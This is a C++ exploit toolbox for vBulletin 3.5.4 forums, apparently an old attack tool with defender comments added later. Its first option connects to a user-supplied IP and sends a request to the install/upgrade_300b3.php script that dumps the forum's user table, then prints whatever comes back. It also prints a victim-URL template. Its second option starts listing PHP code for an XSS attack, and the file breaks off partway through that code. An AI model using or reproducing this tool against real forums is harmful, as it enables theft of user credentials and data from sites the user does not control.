#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <errno.h>
#include <string.h>
#include <iostream>
using namespace std;

// Console answers read in main(): the menu choice and the yes/no confirmation.
// answer2 is not referenced in the visible part of the file.
string exploit, answer, answer2;

// Socket descriptor returned by socket() and the IPv4 peer it connects to
// (main() fills in AF_INET and port 80).
long s;
sockaddr_in addr;

// Dotted-quad text typed by the user. main() fills it with an unbounded
// `cin >> IPaddr`, so under pre-C++20 extraction rules an input longer than
// 1023 characters writes past the end of this array.
char IPaddr[1024];

// Fixed HTTP/1.0 request sent to the peer. The path is hard-coded; the original
// author's note says it has to be adjusted to the forum's location.
// For defenders: this request line (the install/ upgrade script with
// step=backup&do=sqltable&table=user) is what appears in web-server access
// logs, and a forum whose install/ directory was deleted or access-restricted
// after setup does not serve it.
char sget[] = "GET /install/upgrade_300b3.php?step=backup&do=sqltable&table=user HTTP/1.0\r\nConnection: Close\r\n\r\n";

// 40 MiB receive buffer. main() passes the full size to recv() and then prints
// the buffer with "%s", so a completely filled buffer has no terminating NUL.
char stry[40 * 1024 * 1024];

// Byte count returned by recv().
long I;

// State of the dotted-quad check in main():
long M;  // -1 once the text is rejected, otherwise a running character count
long J;  // number of '.' separators seen (three are required)
long K;  // digits seen in the current group (more than three is rejected)
long L;  // numeric value of the current group

// Index into IPaddr used by that check.
int i;
int main()
{
cout << "> Welcome to vbulletin 3.5.4 Exploit-Toolbox v.0.1.1" << endl;
cout << "> Here you can find all released vbullein 3.5.4 exploits" << endl;
cout << "> Press 1 for Install_path exploit" << endl;
cout << "> Press 2 for Xss vbulletin 3.5.x (test: 3.5.4)" << endl;
cout << "> Press 3 for vBulletin 3.5.4 Flood Exploit" << endl;
cout << "> Programm Author M4k3, www.pldsoft.com" << endl;
cout << "> Copyright by PLDsoft.com" << endl;
cout << "> Number? "; cin >> exploit;
cout << endl;
if (exploit == "1")
{
cout << " ____________________ " << endl;
cout << " |---PLDsoft.com------|" << endl;
cout << " |--------------------|" << endl;
cout << " |-vbulletin 3.5.4---|" << endl;
cout << " |install_path exploit|" << endl;
cout << " |____________________|" << endl;
cout << "##############################################" << endl;
cout << "vBulltin 3.5.4 exploit.....install path is open or not secure" << endl;
cout << "###############################################" << endl;
cout << endl;
cout << "Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com" << endl;
cout << "Remote : Yes" << endl;
cout << "Critical Level : Dangerous"<< endl;
cout << "############################################" << endl;
cout << "Affected software description :" << endl;
cout << endl;
cout << "Application : vbulletin" << endl;
cout << "version : latest version [ 3.60 Release 4 ]" << endl;
cout << "URL : http://www.vbulletin.com" << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Exploit:" << endl;
cout << endl;
cout << "www.vicitimsite.com/forumpath/install/upgrade.php?step=[writehereanylettersbutnotnumbers!]" << endl;
cout << endl;
cout << "when it works, you can download the database..." << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Contact:" << endl;
cout << "Nick: M4k3" << endl;
cout << "E-mail: [email protected]" << endl;
cout << "Website: http://www.pldsoft.com" << endl;
cout << "_______End of Exploit______" << endl;
cout << endl;
sleep(1);
cout << "Use the exploit now?" << endl;
cout << "yes/no: "; cin >> answer;
}
if (answer == "yes")
{
cout << "Starting vbulletin 3.5.4 install_path exploit" << endl;
{
cout << "Insert IP: "; cin >> IPaddr;
M = 0;
J = 0;
K = 0;
L = 0;
while(IPaddr[i] != 0)
{
if(IPaddr[i] >= '0' && IPaddr[i] <= '9')
{
L *= 10;
L += IPaddr[i] - '0';
K++;
if(K > 3)
{
M = -1;
break;
}
}
else if(IPaddr[i] == '.')
{
if(K == 0)
{
M = -1;
break;
}
if(L >= 255)
{
M = -1;
break;
}
J++;
K = 0;
L = 0;
}
else
{
M = -1;
break;
}
M++;
}
if(M == -1 || J != 3)
{
cout << "> Invalid IP-Address!" << endl;
return 0;
}
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
addr.sin_family = AF_INET;
inet_aton(IPaddr, &addr.sin_addr);
addr.sin_port = htons(80);
if(connect(s, (sockaddr*) &addr, sizeof(sockaddr_in)))
{
printf("Failure: Connection Rested!\r\n");
close(s);
return 1;
}
if(send(s, sget, strlen(sget), 0) == 0)
{
printf("Failure: Not able to send packets!\r\n");
close(s);
return 2;
}
if((I = recv(s, stry, 41943040, 0)) == 0)
{
printf("Failure: Not able to receive packets!\r\n");
close(s);
return 3;
return 0;
}
close(s);
printf("Packets received succesfully!\r\nBytes of received Data: %d\r\n", I);
printf("%s", stry);
return 0;
}
}
else if (exploit == "2")
{
cout << "=> Xss Vbulletin 3.5.x ( test: 3.5.4 )"<< endl;
cout << "=> Author: SpiderZ"<< endl;
cout << "=> Sito: www.spiderz.tk"<< endl;
cout << endl;
cout << "_____________________________________________________________"<< endl;
cout << endl;
cout << "( 1 )"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$ip_adresse = $_SERVER['REMOTE_ADDR']; "<< endl;
cout << "if(!empty($ip_adresse)) "<< endl;
cout << "{ "<< endl;
cout << "echo 'il tuo ip ?: ',$ip_adresse; "<< endl;
cout << "} "<< endl;
cout << "else "<< endl;
cout << "{ "<< endl;
cout << "echo 'Impossible d\'afficher l\'IP'; "<< endl;
cout << "} "<< endl;
cout << "?> "<< endl;
cout << endl;
cout << "<a href=""log.php""></a><?"<< endl;
cout << "$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];"<< endl;
cout << "$day = date(""d"",time()); $month = date(""m"",time()); $year = date(""Y"",time());"<< endl;
cout << "if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;"<< endl;
cout << "else $visitor_info = $REMOTE_HOST;"<< endl;
cout << "$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;"<< endl;
cout << "$x1=`host $REMOTE_ADDR|grep Name`;"<< endl;
cout << "$x2=$REMOTE_PORT;"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "<?php"<< endl;